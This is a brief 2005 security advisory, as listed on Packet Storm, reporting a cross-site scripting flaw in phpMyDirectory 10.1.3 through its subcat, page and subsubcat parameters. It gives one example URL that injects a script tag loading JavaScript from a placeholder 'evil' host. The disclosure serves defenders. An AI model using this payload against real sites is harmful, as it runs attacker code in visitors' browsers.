phpMyDirectory1013.txt

2005-03-25T00:00:00
ID PACKETSTORM:36812
Type packetstorm
Reporter mircia
Modified 2005-03-25T00:00:00

Description

                                        
                                            `  
  
Talte Security Advisory #3  
  
Product: phpMyDirectory 10.1.3-rel  
Homepage: http://www.phpmydirectory.com/  
Risk: low  
Type: Cross Site Scripting  
Bug Found by: "Talte Security - mircia"  
  
phpMyDirectory is a multi-purpose script,  
this script can be successfully implemented  
for Proffesional Yellow pages, books library,  
friend finder etc.  
  
A cross site scripting problem exists  
in subcat,page,subsubcat variables.  
  
  
Examples:  
  
http://localhost/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>  
  
Everything in foo.js gets executed  
  
// Best Regrads - Talte security, mircia   
`